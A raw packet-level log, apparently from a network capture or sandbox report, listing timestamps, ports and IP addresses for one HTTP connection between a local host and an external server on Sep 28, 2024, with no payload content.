Sep 28, 2024 17:52:13.256253958 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.256275892 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.256292105 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.256298065 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.256311893 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.256313086 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.256329060 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.256344080 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.256345034 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.256364107 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.256392002 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.256421089 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.256421089 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.257148981 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.257164001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.257180929 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.257194996 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.257205009 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.257211924 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.257241011 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.257263899 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.258110046 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.258126020 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.258177996 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.343251944 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.343286037 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.343352079 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.343410015 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.389256001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.389275074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.389292002 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.389406919 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.389620066 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.389636040 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.389652967 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.389677048 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.389719963 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.390151978 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390167952 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390188932 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390203953 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390223026 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.390260935 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.390583038 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390598059 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390614986 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390641928 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.390671015 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.390743971 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390759945 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390777111 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.390789986 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.390825033 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.391648054 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391663074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391678095 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391691923 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391706944 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391710043 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.391748905 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.391813993 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391829967 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391845942 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391860008 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.391861916 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.391892910 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.391921043 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.392425060 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.392441034 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.392501116 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.392913103 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.392927885 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.392942905 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.393002987 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.393002987 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.393228054 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.393244028 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.393253088 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.393301964 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.393342018 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.393909931 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.393924952 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.393940926 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.393955946 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.393965006 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.393987894 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.394020081 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.394789934 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.394821882 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.394838095 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.394853115 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.394855022 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.394871950 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.394889116 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.394893885 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.394906998 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.394922018 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.394922972 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.394942045 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.394972086 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.395806074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.395873070 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.476243973 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.476262093 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.476277113 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.476423979 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.476701021 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.478054047 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.478120089 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.478126049 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.478172064 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.510930061 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.510950089 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.510965109 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511055946 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511107922 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511122942 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511147976 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511153936 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511162996 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511173964 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511181116 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511190891 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511204958 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511209965 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511221886 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511238098 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511248112 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511255026 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511367083 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511389971 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511404991 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.511445045 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511445999 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511445999 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511491060 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511492014 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511492014 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.511951923 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512020111 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512109995 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512125015 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512140036 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512154102 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512159109 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512171030 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512175083 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512187958 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512207985 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512234926 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512240887 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512255907 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512273073 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512284994 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512300014 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512320042 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512902975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512928963 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512944937 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.512957096 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512973070 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512989044 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.512993097 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513010979 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513025999 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513036013 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.513041973 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513056040 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.513060093 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513071060 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.513075113 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513087988 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.513092041 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513108015 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.513130903 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.513950109 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513966084 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513982058 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.513997078 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514003038 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.514005899 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514014006 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514031887 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.514038086 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514054060 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514054060 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.514070034 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514080048 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.514086008 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514110088 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.514137030 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.514908075 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514923096 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514946938 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514959097 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.514961958 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514972925 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.514981031 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514996052 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.514997005 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515008926 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515012980 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515027046 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515028954 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515043974 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515047073 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515063047 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515070915 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515094995 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515120029 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515784979 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515800953 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515815020 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515830040 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515840054 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515846014 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515858889 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515870094 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515887022 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515894890 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515902996 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515911102 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515921116 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515935898 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.515940905 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515969038 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.515995026 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.516702890 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516717911 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516733885 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516748905 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516765118 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516769886 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.516781092 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516798019 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516801119 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.516832113 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.516846895 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.516879082 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516895056 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.516922951 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.516937971 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.564665079 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.564682007 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.564696074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.564804077 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.564842939 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.564889908 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.564903975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.564918995 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.564935923 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.564951897 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.564969063 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.566384077 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.566400051 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.566414118 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.566459894 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.566513062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.599539042 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599555016 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599569082 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599584103 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599601984 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599617004 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599632978 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599647045 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599663973 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.599694967 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599710941 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599720955 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.599729061 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599744081 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599745035 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.599761009 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599772930 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.599777937 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599800110 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599802017 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.599813938 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.599822998 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.599850893 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.599864006 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640288115 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640306950 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640324116 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640352011 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640352011 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640376091 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640377998 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640393019 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640400887 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640409946 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640422106 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640425920 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640438080 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640441895 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640456915 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640461922 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640485048 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640503883 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640633106 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640647888 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640664101 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.640676975 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640695095 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.640712976 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641088009 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641135931 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641218901 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641232014 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641263008 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641280890 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641455889 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641472101 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641505957 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641519070 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641660929 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641705990 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641843081 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641885996 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641911030 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641933918 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641954899 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641958952 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641977072 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.641984940 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.641993046 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642005920 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642009974 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642025948 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642031908 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642041922 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642059088 CEST	49730	80	192.168.2.4	84.201.150.223
